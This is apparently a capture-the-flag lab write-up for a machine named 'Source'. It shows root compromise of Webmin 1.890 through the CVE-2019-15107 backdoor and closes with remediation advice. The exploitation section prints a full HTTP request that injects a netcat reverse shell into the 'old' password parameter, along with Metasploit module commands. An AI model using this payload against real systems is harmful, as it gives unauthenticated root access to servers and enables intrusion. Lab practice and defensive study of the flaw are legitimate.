Target IP: source.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Source” is a Linux machine hosting a vulnerable version of Webmin (1.890). Initial access and privilege escalation are achieved simultaneously by exploiting CVE-2019-15107. This vulnerability is a backdoor in the password_change.cgi module that allows Unauthenticated Remote Code Execution (RCE) with Root privileges.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port scanning.
- T1190 (Exploit Public-Facing App): Exploiting Webmin 1.890 Backdoor (CVE-2019-15107).
- T1195 (Supply Chain Compromise): The nature of the vulnerability itself.
2. Operational Setup
Host Configuration
echo "10.10.x.x source.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Your Nmap scan provided the critical lead immediately:
- 22/tcp (SSH): OpenSSH 7.6p1.
- 10000/tcp (HTTP): MiniServ 1.890 (Webmin httpd).
- Note: Webmin typically runs over HTTPS (SSL), even on port 10000. Nmap detected it as
httporssl/http.
B. Service Enumeration (Webmin)
Browsing to https://source.thm:10000 presents the Webmin login page.
- Service: System Administration tool for Linux.
- Version: 1.890 (Visible in Nmap or sometimes on the login page).
4. Vulnerability Analysis: The Backdoor
The History (CVE-2019-15107)
In 2019, it was discovered that a threat actor had compromised the build infrastructure of Webmin. They modified the source code of password_change.cgi to include a command injection vulnerability.
The Malicious Code:
The backdoor checks if the old parameter (current password) matches a specific condition. If the password change feature is enabled, passing a pipe | in the old parameter executes the following command as root.
Checking Vulnerability
We can verify this without a full shell by checking if the server responds to the malicious parameter.
- Search:
searchsploit webmin 1.890 - Result:
Webmin 1.890 - 'password_change.cgi' Remote Command Execution.
5. Exploitation: “Boom, Root Shell”
Since Webmin runs as root to perform system administration tasks, exploiting it grants immediate root access. There is no horizontal or vertical privilege escalation required.
Method 1: Python Script (Manual)
You likely used a script that sends a POST request to the password change endpoint.
The Request:
POST /password_change.cgi HTTP/1.1
Host: source.thm:10000
Referer: https://source.thm:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
user=root&pam=&expired=2&old=test|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f&new1=test2&new2=test2- Injection Point:
old=test|COMMAND
Method 2: Metasploit (The Easy Button)
msfconsole
use exploit/linux/http/webmin_backdoor
set RHOSTS source.thm
set RPORT 10000
set SSL true
set LHOST tun0
runStatus:
# whoami
rootFlags:
- User:
/home/dark/user.txt - Root:
/root/root.txt
6. Remediation (Blue Team)
- Update Webmin: This specific backdoor was removed in version 1.930. Update immediately.
- Restrict Access:
- Management interfaces like Webmin (Port 10000) should not be exposed to the public internet.
- Use a VPN or Firewall rules to restrict access to trusted IPs only.
- Disable Password Change: If updating is not possible immediately, disable the “Password Change” functionality in Webmin configuration, as the backdoor relies on this feature being active.